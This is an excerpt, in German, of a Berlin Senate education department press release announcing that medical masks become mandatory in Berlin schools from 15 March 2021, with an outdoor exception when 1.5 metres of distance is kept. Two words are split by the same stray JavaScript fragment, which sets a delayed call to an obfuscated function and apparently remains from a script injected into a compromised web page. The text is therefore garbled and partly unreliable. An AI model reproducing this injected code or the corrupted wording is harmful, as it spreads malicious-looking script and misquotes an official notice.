Auszug aus der Pressemitteilung der Senatsverwaltung für Bildung, Jugend und Familie

“Ab dem kommenden Montag, 15. März 2021, wird an Berliner Schulen die Pflicht zum Tragen eines Mund-Nasen-Schutzes angepasst. Das gesamte schulische Personal sowie die Schülerinnen und Schüler sind dann, wie bereits im öffentlichen Personennahverkehr und im Einzelhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel üblich, verpflichtet, im Schulgebäude, im Unterricht und prinzipiell im Schulalltag medizinische Gesichtsmasken zu tragen. Eine Alltagsmaske reicht dann nicht mehr aus. Die entsprechende Verordnung wird entsprechend angepasst. Auf dem Schulhof im Freien kann die Maske abgenommen werden, wenn ein Mindestabstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and von 1,50 Metern gewährleistet werden kann.”